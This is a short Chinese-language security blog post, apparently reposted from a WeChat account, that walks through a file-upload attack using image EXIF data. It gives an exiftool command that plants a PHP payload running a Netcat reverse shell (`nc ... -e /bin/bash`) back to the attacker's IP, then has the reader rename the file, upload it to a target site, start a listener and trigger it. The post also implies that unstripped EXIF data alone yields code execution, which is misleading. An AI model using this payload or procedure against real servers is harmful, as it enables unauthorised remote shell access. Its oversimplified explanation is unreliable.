Exif 代表可交换图像文件格式。Exif 数据在您单击的照片中存储敏感信息,例如地理位置、日期、相机名称、修改日期、时间、传感方法、文件源、压缩类型等。现在,这些数据存在于您使用相机拍摄的每张照片中。
如果服务器没有剥离 EXIF 数据,攻击者可以使用该技术获得远程代码执行。
如何找到这个漏洞?
-
转到您的目标网站并检查 Exif 数据漏洞
-
现在拍摄图像并使用exiftool在其中插入有效载荷
payload:
exiftool -Comment='<?php system(“nc <YourIP> <YourPort> -e /bin/bash”); ?>' 文件名.png
插入有效载荷
3.现在为了执行这个文件,我们需要修改扩展名,因为.png不是可执行格式,所以使用这个命令修改文件扩展名
命令 (linux) :
mv filename.png filename.php.png
修改文件
4. 现在将文件上传到您的目标网站
文件上传
5. 在你的机器上启动 Netcat 监听器
6. 现在访问上传文件URL
https://ip/profile/filename.php.png
原文始发于微信公众号(Khan安全攻防实验室):通过 Exif 数据远程执行代码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论